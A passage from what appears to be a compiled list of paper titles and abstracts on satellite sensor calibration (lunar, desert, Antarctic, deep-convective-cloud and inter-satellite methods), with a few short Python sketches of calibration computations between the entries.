day. Many of the instruments were shown to be stable in time, with a few exceptions, but measurements from the same instrument on different platforms are often biased with respect to each other.
The limitations of the polar simultaneous nadir overpasses often used to monitor biases between polar-orbiting sensors are shown with these results due to the apparent strong dependence of some radiance biases on scene temperature. --- paper_title: Radiometric Calibration of Landsat paper_content: The radiometric calibration of the sensors on the Landsat series of satellites is a contributing factor to the success of the Landsat data set. The calibration of these sensors has relied on the preflight laboratory work as well as on inflight techniques using on-board calibrators and vicarious techniques. Descriptions of these methods and systems are presented. Results of the on-board calibrators and reflectance-based, ground reference calibrations of Landsat 5 Thematic Mapper are presented that indicate the absolute radiometric calibration of bands 1 to 4 should have an uncertainty of less than 5.0 percent. Bands 5 and 7 have slightly higher uncertainties, but should be less than 10 percent. The results also show that the on-board calibrators are of higher precision than the vicarious calibration but that the vicarious calibration results should have higher accuracy. The Landsat series of satellites provides the longest running continuous data set of high spatial-resolution imagery dating back to the launch of Landsat 1 in 1972. Part of the success of the Landsat program has been the ability to understand the radiometric properties of the sensors. This understanding has been due to the combination of prelaunch and post-launch efforts using laboratory, on-board, and vicarious calibration methods. The radiometric calibration of these systems helps characterize the operation of the sensors, but more importantly, the calibration allows the full Landsat data set to be used in a quantitative sense. A brief overview of the Landsat systems is given here, but the reader is directed to Engel and Weinstein (1983), Lansing and Cline (1975), Markham and Barker (1987), and Slater (1980) for detailed descriptions. The Landsat series of satellites can be viewed in two distinct parts. The first includes Landsats 1, 2, and 3 that carried two sensor systems: the return beam vidicon (RBV) and the Multispectral Scanner (MSS) system. The RBV camera systems on Landsats 1 and 2 were multispectral with three cameras, while the system on Landsat 3 used only two cameras in a panchromatic mode. Landsats 1, 2, and 3 operated in a 919-km, sun-synchronous orbit with an 18-day repeat cycle. The second phase of Landsat includes Landsats 4 and 5. These platforms omitted the RBV cameras but still carried the MSS. These two platforms also carried the Thematic Mapper (TM), and their orbits were lowered to 705 km with a 16-day repeat cycle. The MSS is a 6-bit, whiskbroom sensor with six detectors for each of its four bands. These bands are centered roughly at 0.55, 0.65, 0.75, and 0.85 μm (the MSS on Landsat 3 also had a fifth band between 10.4 and 12.6 μm). Bands 1 to 3 use photomultiplier tubes, while band 4 uses photodiodes. The MSS only collects data in one scan direction, and there is no compensation in the scan for the forward motion of the platform. At the end of every other scan, a rotating shutter and mirror assembly allows light from a calibration lamp to reach the detectors. The TM is also a whiskbroom system but it scans in both the forward and backward cross-track directions, and it corrects for the forward motion of the platform.
In addition, the TM has 8-bit radiometric resolution and seven bands. Bands 1 to 5 and 7 each have 16 detectors with center wavelengths of roughly 0.49, 0.56, 0.66, 0.83, 1.67, and 2.24 μm. Band 6 has four detectors and is centered around 11.5 μm. Bands 1 to 4 use silicon-based detectors, bands 5 and 7 use indium antimonide detectors, and band 6 uses mercury-cadmium-telluride detectors. Bands 5, 6, and 7 are part of the cold-focal plane that is cooled to 85 K through the use of a radiative cooler. The TM has an on-board calibration system composed of a shutter that oscillates rather than rotates and allows calibration data to be collected at the end of each scan. A great deal of research was done during the early days --- paper_title: Determination of an Amazon Hot Reference Target for the On-Orbit Calibration of Microwave Radiometers paper_content: Abstract A physically based model is developed to determine hot calibration reference brightness temperatures (TBs) over depolarized regions in the Amazon rain forest. The model can be used to evaluate the end-to-end calibration of any satellite microwave radiometer operating at a frequency between 18 and 40 GHz and angle of incidence between nadir and 55°. The model is constrained by Special Sensor Microwave Imager (SSM/I) TBs measured at 19.35, 22.2, and 37.0 GHz at a 53° angle of incidence and extrapolates/interpolates those measurements to other frequencies and incidence angles. The rms uncertainty in the physically based model is estimated to be 0.57 K. For instances in which coincident SSM/I measurements are not available, an empirical formula has been fit to the physical model to provide hot reference brightness temperature as a function of frequency, incidence angle, time of day, and day of year. The empirical formula has a 0.1-K rms deviation from the physically based model for annual averaged me... --- paper_title: Detection of calibration drifts in spaceborne microwave radiometers using a vicarious cold reference paper_content: The coldest possible brightness temperatures observed by a downward-looking microwave radiometer from space are often produced by calm oceans under cloud-free skies and very low humidity. This set of conditions tends to occur with sufficient regularity that an orbiting radiometer will accumulate a useful number of observations within a period of a few days to weeks. Histograms of the radiometer's coldest measurements provide an anchor point against which very small drifts in absolute calibration can be detected. This technique is applied to the TOPEX microwave radiometer (TMR), and a statistically significant drift of several tenths of a Kelvin per year is clearly detected in one of the channels. TMR housekeeping calibration data indicates a likely cause for the drift, as small changes in the isolation of latching ferrite circulators that are used in the onboard calibration-switch assembly. This method can easily be adapted to other microwave radiometers, especially imagers operating at frequencies in the atmospheric windows. In addition to detecting long-term instrument drifts with high precision, the method also provides a means for cross-calibrating different instruments. The cold reference provides a common tie point, even between sensors operating at different polarizations and/or incidence angles.
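The vicarious cold-reference technique in the entry just above anchors the low end of the calibration with the coldest clear-sky ocean brightness temperatures accumulated over days to weeks; a drift then shows up as a trend in that cold anchor. A schematic NumPy sketch follows, with the window length, percentile, and minimum sample count chosen only for illustration.

    import numpy as np

    def cold_reference_series(times_days, tb_kelvin, window_days=30.0, percentile=0.3):
        """Low-end percentile of ocean brightness temperatures in successive windows,
        used as a vicarious cold reference for drift detection."""
        t = np.asarray(times_days, dtype=float)
        tb = np.asarray(tb_kelvin, dtype=float)
        edges = np.arange(t.min(), t.max() + window_days, window_days)
        centers, cold = [], []
        for lo, hi in zip(edges[:-1], edges[1:]):
            sel = (t >= lo) & (t < hi)
            if sel.sum() >= 100:  # need enough samples to resolve the cold tail
                centers.append(0.5 * (lo + hi))
                cold.append(np.percentile(tb[sel], percentile))
        return np.array(centers), np.array(cold)

    # A calibration drift appears as a slope in the cold-reference series, e.g.:
    # slope_per_day, offset = np.polyfit(centers, cold, 1)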
--- paper_title: In-flight calibration of large field of view sensors at short wavelengths using Rayleigh scattering paper_content: Abstract Satellite observations over the ocean in the backscatter direction are dominated by Rayleigh scattering. We use this predictable radiance for in-flight calibration of the visible SPOT channels. Two methods are evaluated. The first method directly relates the measured numerical signal in a short wavelength channel to the predicted reflectance. In the second method, we use a second channel centred at a longer wavelength, to correct the short wavelength channel for the effect of the atmospheric aerosol contribution. These two methods are examined for channel B0, centred at 0.45 μm, planned for launch on SPOT-4 VEGETATION, and for channel B1, centred at 0.55 μm, currently on-board SPOT-1 HRV. In both cases, the channel B3, centred at 0.85 μm, is used for aerosol correction. Error analysis shows that accuracies of 3 and 5 per cent respectively can be achieved for B0 and B1. The last section of the paper is devoted to a validation of the error analysis using SPOT-1 HRV data. --- paper_title: Monitoring of Radiometric Sensitivity Changes of Space Sensors Using Deep Convective Clouds: Operational Application to PARASOL paper_content: Deep convective clouds have been tested to be used as stable reference for calibration purposes: the monitoring of the radiometric changes of space sensors in the spectral range from blue to short-wave infrared. After an appropriate selection, the clouds have been characterized for their brightness, spectral aspects, bidirectional signature, stability, and homogeneity. For this, radiative transfer computations using a discrete ordinate code, as well as remote sensing measurements from the PARASOL satellite, were analyzed. The first main result is a confirmation that the monthly mean reflectance over deep convective clouds is quite stable as suggested in other papers. Moreover, the excellent spectral properties of deep convective clouds are really convenient for a temporal monitoring if it can be assumed that a reference band is stable or well characterized with time. If the reference band is perfectly known, the accuracy of the temporal monitoring is about 0.2%. Experimental results are provided with PARASOL data for which the temporal drift is known with an accuracy better than 0.5% for the three years in orbit (accuracy which includes the uncertainty of the reference band). --- paper_title: Comparison of SeaWiFS measurements of the Moon with the U.S. Geological Survey lunar model. paper_content: The Sea-Viewing Wide-Field-of-View Sensor (SeaWiFS) has made monthly observations of the Moon since 1997. Using 66 monthly measurements, the SeaWiFS calibration team has developed a correction for the instrument's on-orbit response changes. Concurrently, a lunar irradiance model has been developed by the U.S. Geological Survey (USGS) from extensive Earth-based observations of the Moon. The lunar irradiances measured by SeaWiFS are compared with the USGS model. The comparison shows essentially identical response histories for SeaWiFS, with differences from the model of less than 0.05% per thousand days in the long-term trends. From the SeaWiFS experience we have learned that it is important to view the entire lunar image at a constant phase angle from measurement to measurement and to understand, as best as possible, the size of each lunar image. However, a constant phase angle is not required for using the USGS model.
With a long-term satellite lunar data set it is possible to determine instrument changes at a quality level approximating that from the USGS lunar model. However, early in a mission, when the dependence on factors such as phase and libration cannot be adequately determined from satellite measurements alone, the USGS model is critical to an understanding of trends in instruments that use the Moon for calibration. This is the case for SeaWiFS. --- paper_title: Possibility of the Visible-Channel Calibration Using Deep Convective Clouds Overshooting the TTL paper_content: Abstract The authors examined the possible use of deep convective clouds (DCCs), defined as clouds that overshoot the tropical tropopause layer (TTL), for the calibration of satellite measurements at solar channels. DCCs are identified in terms of the Moderate Resolution Imaging Spectroradiometer (MODIS) 10.8-μm brightness temperature (TB11) on the basis of a criterion specified by TB11 ≤ 190 K. To determine the characteristics of these clouds, the MODIS-based cloud optical thickness (COT) and effective radius (re) for a number of identified DCCs are analyzed. It is found that COT values for most of the 4249 DCC pixels observed in January 2006 are close to 100. Based on the MODIS quality-assurance information, 90% and 70.2% of the 4249 pixels have COT larger than 100 and 150, respectively. On the other hand, the re values distributed between 15 and 25 μm show a sharp peak centered approximately at 20 μm. Radiances are simulated at the MODIS 0.646-μm channel by using a radiative transfer model under homoge... --- paper_title: Selection and characterization of Saharan and Arabian desert sites for the calibration of optical satellite sensors paper_content: Desert areas are good candidates for the assessment of multitemporal, multiband, or multiangular calibration of optical satellite sensors. This article describes a selection procedure of desert sites in North Africa and Saudi Arabia, of size 100 × 100 km2, using a criterion of spatial uniformity in a series of Meteosat-4 visible data. Twenty such sites are selected with a spatial uniformity better than 3% in relative value in a multitemporal series of cloud free images. These sites are among the driest sites in the world. Their meteorological properties are here described in terms of cloud cover with ISCCP data and precipitation using data from a network of meteorological stations. Most of the selected sites are large sand seas, the geomorphology of which can be characterized with Spot data. The temporal stability of the spatially averaged reflectance of each selected site is investigated at seasonal and hourly time scales with multitemporal series of Meteosat-4 data. It is found that the temporal variations, of typical peak-to-peak amplitude 8–15% in relative value, are mostly controlled by directional effects. Once the directional effects are removed, the residual rms variations, representative of random temporal variability, are on the order of 1–2% in relative value. The suitability of use of these selected sites in routine operational calibration procedures is briefly discussed. --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. 
Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10⁻⁸ per annum for irradiance, and 1 × 10⁻⁷ per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. --- paper_title: The Spectral Irradiance of the Moon paper_content: Images of the Moon at 32 wavelengths from 350 to 2450 nm have been obtained from a dedicated observatory during the bright half of each month over a period of several years. The ultimate goal is to develop a spectral radiance model of the Moon with an angular resolution and radiometric accuracy appropriate for calibration of Earth-orbiting spacecraft. An empirical model of irradiance has been developed that treats phase and libration explicitly, with absolute scale founded on the spectra of the star Vega and returned Apollo samples. A selected set of 190 standard stars are observed regularly to provide nightly extinction correction and long-term calibration of the observations. The extinction model is wavelength-coupled and based on the absorption coefficients of a number of gases and aerosols. The empirical irradiance model has the same form at each wavelength, with 18 coefficients, eight of which are constant across wavelength, for a total of 328 coefficients. Over 1000 lunar observations are fitted at each wavelength; the average residual is less than 1%. The irradiance model is actively being used in lunar calibration of several spacecraft instruments and can track sensor response changes at the 0.1% level. --- paper_title: In-flight calibration of the POLDER polarized channels using the Sun's glitter paper_content: The spaceborne sensor Polarization and Directionality of the Earth Reflectances (POLDER), launched on the Japanese platform Advanced Earth Observation Satellite (ADEOS) on August 17, 1996, is a new instrument devoted to multispectral observations of the directionality and polarization of the solar radiation reflected by the Earth-atmosphere system. Polarization measurements are performed in three channels, centered at 443, 670, and 865 nm. As POLDER has no onboard calibration system, in-flight calibration methods have been developed. The authors address in this paper the calibration of the polarization measurements. The method uses the sunlight reflected within the Sun's glitter. While the radiance of the Sun's glitter depends strongly on the sea surface roughness, its intrinsic degree of polarization depends only on the observation geometry, which is specially convenient for calibration purposes. However, the degree of polarization measured at the satellite level is affected by the atmosphere. The proposed calibration scheme allows the authors to take into account the influence of the atmosphere on the degree of polarization measured in some viewing direction within the glitter pattern by using the radiance measured in the same viewing direction and in another direction far from the glitter.
The expected accuracy is about 0.5% in the near-infrared channel 865 nm and about 2% in the visible channels, in terms of percent polarization. The method has been applied successfully to measurements achieved over ocean areas with the airborne version of the POLDER instrument. --- paper_title: Evaluation of radiative transfer simulations over bright desert calibration sites paper_content: The Spinning Enhanced Visible and Infrared Imager (SEVIRI), the Meteosat Second Generation main radiometer, measures the reflected solar radiation within three spectral bands centered at 0.6, 0.8, and 1.6 μm, and within a broadband. This broadband is similar to the solar channel of the radiometer onboard the first generation of METEOSAT satellites. The operational absolute calibration of these channels relies on modeled radiances over bright desert sites, as no in-flight calibration device is available. These simulated radiances represent, therefore, the "reference" against which SEVIRI is calibrated. The present study describes the radiative properties of these targets and evaluates the uncertainties associated with the characterization of this "reference", i.e. the modeled radiances. To this end, top-of-atmosphere simulated radiances are compared with several thousands of calibrated observations acquired by the European Remote Sensing 2/Along-Track Scanning Radiometer 2 (ERS2/ATSR-2), SeaStar/Sea-viewing Wide Field-of-view Sensor (SeaWiFS), Système Pour l'Observation de la Terre 4 (SPOT-4/VEGETATION), and the Environmental Research Satellite/Medium Resolution Imaging Spectrometer (ENVISAT/MERIS) instruments over the SEVIRI desert calibration sites. Results show that the mean relative bias between observation and simulation does not exceed 3% in the red and near-infrared spectral bands with respect to the first two instruments. --- paper_title: Evaluation of ISCCP Multisatellite Radiance Calibration for Geostationary Imager Visible Channels Using the Moon paper_content: Since 1983, the International Satellite Cloud Climatology Project (ISCCP) has collected Earth radiance data from the succession of geostationary and polar-orbiting meteorological satellites operated by weather agencies worldwide. Meeting the ISCCP goals of global coverage and decade-length time scales requires consistent and stable calibration of the participating satellites. For the geostationary imager visible channels, ISCCP calibration provides regular periodic updates from regressions of radiances measured from coincident and collocated observations taken by Advanced Very High Resolution Radiometer instruments. As an independent check of the temporal stability and intersatellite consistency of ISCCP calibrations, we have applied lunar calibration techniques to geostationary imager visible channels using images of the Moon found in the ISCCP data archive. Lunar calibration enables using the reflected light from the Moon as a stable and consistent radiometric reference. Although the technique has general applicability, limitations of the archived image data have restricted the current study to Geostationary Operational Environmental Satellite and Geostationary Meteorological Satellite series. The results of this lunar analysis confirm that ISCCP calibration exhibits negligible temporal trends in sensor response but have revealed apparent relative biases between the satellites at various levels. However, these biases amount to differences of only a few percent in measured absolute reflectances.
Since the lunar analysis examines only the lower end of the radiance range, the results suggest that the ISCCP calibration regression approach does not precisely determine the intercept or the zero-radiance response level. We discuss the impact of these findings on the development of consistent calibration for multisatellite global data sets. --- paper_title: Improvements in the star-based monitoring of GOES Imager visible-channel responsivities paper_content: Stars are regularly observed in the visible channels of the GOES Imagers for real-time navigation operations. However, we have also been using star observations off-line to deduce the rate of degradation of the responsivity of the visible channels. We estimate degradation rates from the time series of the intensities of the Imagers' output signals, available in the GOES Orbit and Attitude Tracking System (OATS). We begin by showing our latest results in monitoring the responsivities of the visible channels on GOES-8, GOES-10 and GOES-12. Unfortunately, the OATS computes the intensities of the star signals with approximations suitable for navigation, not for estimating accurate signal strengths, and thus we had to develop objective criteria for screening out unsuitable data. With several layers of screening, our most recent trending method yields smoother time series of star signals, but the time series are supported by a smaller pool of stars. With the goal of simplifying the task of data selection and to retrieve stars that have been rejected in the screening, we tested a technique that accessed the raw star measurements before they were processed by the OATS. We developed formulations that produced star signals in a manner more suitable for monitoring the conditions of the visible channels. We present specifics of this process together with sample results. We discuss improvements in the quality of the time series that allow for more reliable inferences on the characteristics of the visible channels. --- paper_title: Recent advances in calibration of the GOES Imager visible channel at NOAA paper_content: To track the degradation of the Imager visible channel on board NOAA’s Geostationary Operational Environmental Satellite (GOES), a research program has been developed using the stellar observations obtained for the purpose of instrument navigation. For monitoring the responsivity of the visible channel, we use observations of approximately fifty stars for each Imager. The degradation of the responsivity is estimated from a single time series based on 30-day averages of the normalized signals from all the stars. Referencing the 30-day averages to the first averaged period of operation, we are able to compute a relative calibration coefficient relative to the first period. Coupling this calibration coefficient with a GOES-MODIS intercalibration technique allows a direct comparison of the star-based relative GOES calibration to a MODIS-based absolute GOES calibration, thus translating the relative star-based calibration to an absolute star-based calibration. We conclude with a discussion of the accuracy of the intercalibrated GOES Imager visible channel radiance measurements.
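Both GOES entries above trend the visible-channel responsivity by forming 30-day averages of normalized star signals and referencing them to the first averaging period. A compact pandas sketch of that bookkeeping is given below; the assumption that the star signals are already normalized by per-star reference values, and the function name itself, are illustrative rather than a reconstruction of the OATS processing.

    import pandas as pd

    def relative_calibration(star_signals, period="30D"):
        """star_signals: pandas Series of normalized star intensities with a DatetimeIndex.
        Returns the per-period mean signal and a relative calibration coefficient
        referenced to the first period (values above 1 indicate responsivity loss)."""
        period_mean = star_signals.resample(period).mean().dropna()
        rel_coeff = period_mean.iloc[0] / period_mean
        return period_mean, rel_coeff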
--- paper_title: The Global Space-Based Inter-Calibration System paper_content: The Global Space-based Inter-Calibration System (GSICS) is a new international program to assure the comparability of satellite measurements taken at different times and locations by different instruments operated by different satellite agencies. Sponsored by the World Meteorological Organization and the Coordination Group for Meteorological Satellites, GSICS will intercalibrate the instruments of the international constellation of operational low-earth-orbiting (LEO) and geostationary earth-orbiting (GEO) environmental satellites and tie these to common reference standards. The intercomparability of the observations will result in more accurate measurements for assimilation in numerical weather prediction models, construction of more reliable climate data records, and progress toward achieving the societal goals of the Global Earth Observation System of Systems. GSICS includes globally coordinated activities for prelaunch instrument characterization, onboard routine calibration, sensor intercomparison of... --- paper_title: Deriving an inter-sensor consistent calibration for the AVHRR solar reflectance data record paper_content: A new set of reflectance calibration coefficients has been derived for channel 1 (0.63 μm) and channel 2 (0.86 μm) of the Advanced Very High Resolution Radiometer (AVHRR) flown on the National Oceanic and Atmospheric Administration (NOAA) and European Organization for the Exploitation of Meteorological Satellites (EUMETSAT) polar orbiting meteorological satellites. This paper uses several approaches that are radiometrically tied to the observations from National Aeronautics and Space Administration's (NASA's) Moderate Resolution Imaging Spectroradiometer (MODIS) imager to make the first consistent set of AVHRR reflectance calibration coefficients for every AVHRR that has ever flown. Our results indicate that the calibration coefficients presented here provide an accuracy of approximately 2% for channel 1 and 3% for channel 2 relative to that from the MODIS sensor.
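The GSICS correction summarized in the Metop/IASI inter-calibration entry earlier in this list comes down to a weighted linear regression of collocated geostationary radiances against the IASI-based reference, with the fitted coefficients defining the correction and their covariance serving as the quality indicator. The sketch below is a generic weighted least-squares fit under those stated assumptions; the weighting scheme and the direction in which the correction is applied are simplifications, not the operational GSICS code.

    import numpy as np

    def gsics_style_fit(ref_radiance, mon_radiance, weights):
        """Weighted fit of mon = offset + slope * ref over collocations.
        Returns (offset, slope) and their 2x2 covariance as an uncertainty estimate."""
        ref = np.asarray(ref_radiance, dtype=float)
        mon = np.asarray(mon_radiance, dtype=float)
        w = np.sqrt(np.asarray(weights, dtype=float))
        A = np.vstack([np.ones_like(ref), ref]).T * w[:, None]
        y = mon * w
        coeff, *_ = np.linalg.lstsq(A, y, rcond=None)
        resid = y - A @ coeff
        dof = max(len(y) - 2, 1)
        cov = np.linalg.inv(A.T @ A) * float(resid @ resid) / dof
        return coeff, cov

    def apply_correction(mon_radiance, coeff):
        """Map a monitored-instrument radiance onto the reference radiance scale."""
        offset, slope = coeff
        return (np.asarray(mon_radiance, dtype=float) - offset) / slope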
--- paper_title: Improved calibration coefficients for NOAA-14 AVHRR visible and near-infrared channels paper_content: An analysis of the calibration coefficients used to describe sensor degradation in channels 1 and 2 of the Advanced Very High Resolution Radiometer (AVHRR) on the NOAA-14 spacecraft is presented. The radiometrically stable permanent ice sheet of central Antarctica is used as a calibration target to characterize sensor performance. Published calibration coefficients and the coefficients imbedded in the NOAA Level 1b data stream for the period January 1995 to November 1998 are shown to be deficient in correcting for the degradation of the sensor with time since launch. Calibration formulae constructed from NOAA-9 reflectances are used to derive improved calibration coefficients for the AVHRR visible and near-infrared channels for NOAA-14. Channel 1 reflectances for the Greenland ice sheet derived using the new coefficients are consistent with those derived previously using NOAA-9 AVHRR. In addition, improved reference AVHRR channel 2 reflectances for Greenland are derived from NOAA-14 observations. It is re... --- paper_title: Surface characterisation of the Dome Concordia area (Antarctica) as a potential satellite calibration site, using Spot 4/Vegetation instrument paper_content: A good calibration of satellite sensors is necessary to derive reliable quantitative measurements of the surface parameters or to compare data obtained from different sensors. In this study, the snow surface of the high plateau of the East Antarctic ice sheet, particularly the Dome C area (75°S, 123°E), is used first to test the quality of this site as a ground calibration target and then to determine the inter-annual drift in the sensitivity of the VEGETATION sensor, onboard the SPOT4 satellite. Dome C area has many good calibration site characteristics: The site is very flat and extremely homogeneous (only snow), there is little wind and a very small snow accumulation rate and therefore a small temporal variability, the elevation is 3200 m and the atmosphere is very clear most of the time. Finally, due to its location, it is frequently within view of many satellites. VEGETATION visible blue channel data (0.43–0.47 μm) of a 716 × 716 km² area centred on the French–Italian Dome Concordia station, during the 1998–1999, 1999–2000, 2000–2001, and 2001–2002 austral summers were cloud masked and atmospherically corrected. The snow surface Bidirectional Reflectance Distribution Function is very high with little spatial and seasonal variability, which is a major advantage for sensor calibration. The inter-annual variation is found to be very small, proving that the stability of the site is very good. --- paper_title: Establishing the Antarctic Dome C community reference standard site towards consistent measurements from Earth observation satellites paper_content: Establishing satellite measurement consistency by using common desert sites has become increasingly more important not only for climate change detection but also for quantitative retrievals of geophysical variables in satellite applications. Using the Antarctic Dome C site (75°06′S, 123°21′E, elevation 3.2 km) for satellite radiometric calibration and validation (Cal/Val) is of great interest owing to its unique location and characteristics. The site surface is covered with uniformly distributed permanent snow, and the atmospheric effect is small and relatively constant.
In this study, the long-term stability and spectral characteristics of this site are evaluated using well-calibrated satellite instruments such as the Moderate Resolution Imaging Spectroradiometer (MODIS) and Sea-viewing Wide Field-of-view Sensor (SeaWiFS). Preliminary results show that despite a few limitations, the site in general is stable in the long term, the bidirectional reflectance distribution function (BRDF) model works well, an... --- paper_title: Spectral bidirectional reflectance of Antarctic snow: Measurements and parameterization paper_content: The bidirectional reflectance distribution function (BRDF) of snow was measured from a 32-m tower at Dome C, at latitude 75°S on the East Antarctic Plateau. These measurements were made at 96 solar zenith angles between 51° and 87° and cover wavelengths 350–2400 nm, with 3- to 30-nm resolution, over the full range of viewing geometry. The BRDF at 900 nm had previously been measured at the South Pole; the Dome C measurement at that wavelength is similar. At both locations the natural roughness of the snow surface causes the anisotropy of the BRDF to be less than that of flat snow. The inherent BRDF of the snow is nearly constant in the high-albedo part of the spectrum (350–900 nm), but the angular distribution of reflected radiance becomes more isotropic at the shorter wavelengths because of atmospheric Rayleigh scattering. Parameterizations were developed for the anisotropic reflectance factor using a small number of empirical orthogonal functions. Because the reflectance is more anisotropic at wavelengths at which ice is more absorptive, albedo rather than wavelength is used as a predictor in the near infrared. The parameterizations cover nearly all viewing angles and are applicable to the high parts of the Antarctic Plateau that have small surface roughness and, at viewing zenith angles less than 55°, elsewhere on the plateau, where larger surface roughness affects the BRDF at larger viewing angles. The root-mean-squared error of the parameterized reflectances is between 2% and 4% at wavelengths less than 1400 nm and between 5% and 8% at longer wavelengths. --- paper_title: Reflection of solar radiation by the Antarctic snow surface at ultraviolet, visible, and near-infrared wavelengths paper_content: The variation of snow albedo with wavelength across the solar spectrum from 0.3 μm in the ultraviolet (UV) to 2.5 μm in the near infrared (IR) was measured at Amundsen-Scott South Pole Station during the Antarctic summers of 1985–1986 and 1990–1991. Similar results were obtained at Vostok Station in summer 1990–1991. The albedo has a uniformly high value of 0.96–0.98 across the UV and visible spectrum, nearly independent of snow grain size and solar zenith angle, and this value probably applies throughout the interior of Antarctica. The albedo in the near IR is lower, dropping below 0.15 in the strong absorption bands at 1.5 and 2.0 μm; and it is quite sensitive to grain size and somewhat sensitive to zenith angle. Near-IR albedos were slightly lower at Vostok than at South Pole, but day-to-day variations in the measured grain size due to precipitation, drifting, and metamorphism were found to cause temporal variations in near-IR albedo larger than those due to any systematic geographical change from South Pole to Vostok. The spectrally averaged albedos ranged from 0.80 to 0.85 for both overcast and clear skies, in agreement with measurements by others at South Pole and elsewhere in Antarctica. 
Using a two-layer radiative transfer model, the albedo can be explained over the full wavelength range. Tests were made to correct for systematic errors in determining spectral albedo. Under clear skies at about 3000-m elevation the diffuse fraction of downward irradiance varied from 0.4 in the near UV to less than 0.01 in the near IR; knowledge of this fraction is required to correct the measured irradiance for the instrument's deviation from a perfect cosine-response. Furthermore, the deviation from cosine response is itself a function of wavelength. Under clear skies a significant error in apparent albedo can result if the instrument's cosine collector is not parallel to the surface; e.g., if the instrument is leveled parallel to the horizon, but the local snow surface is not horizontal. The soot content of the snow upwind of South Pole Station was only 0.3 ng/g. It was somewhat greater at Vostok Station but was still too small to affect the albedo at any wavelength. Bidirectional reflectance at 0.9-μm wavelength, measured from a 23-m tower at the end of summer after the sastrugi (snow dunes) had diminished, showed a pattern remarkably similar to the spectrally averaged pattern obtained from the Nimbus 7 satellite. --- paper_title: Vicarious Radiometric Calibrations of EOS Sensors paper_content: Abstract Four methods for the in-flight radiometric calibration and cross calibration of multispectral imaging sensors are described. Three make use of ground-based reflectance, irradiance, and radiance measurements in conjunction with atmospheric measurements and one compares calibrations between sensors. Error budgets for these methods are presented and their validation is discussed by reference to SPOT and TM results and shown to meet the EOS requirements in the solar-reflective range. --- paper_title: The Miami2001 Infrared Radiometer Calibration and Intercomparison. Part I: Laboratory Characterization of Blackbody Targets paper_content: Abstract The second calibration and intercomparison of infrared radiometers (Miami2001) was held at the University of Miami's Rosenstiel School of Marine and Atmospheric Science (RSMAS) during May–June 2001. The participants were from several groups involved with the validation of skin sea surface temperatures and land surface temperatures derived from the measurements of imaging radiometers on earth observation satellites. These satellite instruments include those currently on operational satellites and others that will be launched within two years following the workshop. There were two experimental campaigns carried out during the 1-week workshop: a set of measurements made by a variety of ship-based radiometers on board the Research Vessel F. G. Walton Smith in Gulf Stream waters off the eastern coast of Florida, and a set of laboratory measurements of typical external blackbodies used to calibrate these ship-based radiometers. This paper reports on the results obtained from the laboratory characteriza... --- paper_title: Reflectance quantities in optical remote sensing—definitions and case studies paper_content: Abstract The remote sensing community puts major efforts into calibration and validation of sensors, measurements, and derived products to quantify and reduce uncertainties. Given recent advances in instrument design, radiometric calibration, atmospheric correction, algorithm development, product development, validation, and delivery, the lack of standardization of reflectance terminology and products becomes a considerable source of error. 
This article provides full access to the basic concept and definitions of reflectance quantities, as given by Nicodemus et al. [Nicodemus, F.E., Richmond, J.C., Hsia, J.J., Ginsberg, I.W., and Limperis, T. (1977). Geometrical Considerations and Nomenclature for Reflectance. In: National Bureau of Standards, US Department of Commerce, Washington, D.C. URL: http://physics.nist.gov/Divisions/Div844/facilities/specphoto/pdf/geoConsid.pdf .] and Martonchik et al. [Martonchik, J.V., Bruegge, C.J., and Strahler, A. (2000). A review of reflectance nomenclature used in remote sensing. Remote Sensing Reviews, 19, 9–20.]. Reflectance terms such as BRDF, HDRF, BRF, BHR, DHR, black-sky albedo, white-sky albedo, and blue-sky albedo are defined, explained, and exemplified, while separating conceptual from measurable quantities. We use selected examples from the peer-reviewed literature to demonstrate that very often the current use of reflectance terminology does not fulfill physical standards and can lead to systematic errors. Secondly, the paper highlights the importance of a proper usage of definitions through quantitative comparison of different reflectance products with special emphasis on wavelength dependent effects. Reflectance quantities acquired under hemispherical illumination conditions (i.e., all outdoor measurements) depend not only on the scattering properties of the observed surface, but as well on atmospheric conditions, the object's surroundings, and the topography, with distinct expression of these effects in different wavelengths. We exemplify differences between the hemispherical and directional illumination quantities, based on observations (i.e., MISR), and on reflectance simulations of natural surfaces (i.e., vegetation canopy and snow cover). In order to improve the current situation of frequent ambiguous usage of reflectance terms and quantities, we suggest standardizing the terminology in reflectance product descriptions and that the community carefully utilizes the proposed reflectance terminology in scientific publications. --- paper_title: Spectral reflectance measurement methodologies for Tuz Golu field campaign paper_content: A field campaign had been organized in August 2010 on Tuz Golu salt lake, Turkey, with the aim of characterizing the site for satellite optical sensor vicarious calibration, and of comparing different methodologies of surface reflectance factor characterization. Several teams have made ground-based reflectance measurements with a field spectrometer on different areas of the salt lake of 100 m × 300 m and 1km × 1 km size. Different types of sampling strategies and measurements methods have been used by the participants, and are described in this paper. Preliminary results on one area are presented, that show a good agreement between the different measurements. --- paper_title: Reflectance- and radiance-based methods for the in-flight absolute calibration of multispectral sensors paper_content: Abstract Variations reported in the in-flight absolute radiometric calibration of the Coastal Zone Color Scanner (CZCS) and the Thematic Mapper (TM) on Landsat 4 are reviewed. At short wavelengths these sensors exhibited a gradual reduction in response, while in the midinfrared the TM showed oscillatory variations, according to the results of TM internal calibration. The methodology and results are presented for five reflectance-based calibrations of the Landsat 5 TM at White Sands, NM, in the period July 1984 to November 1985. 
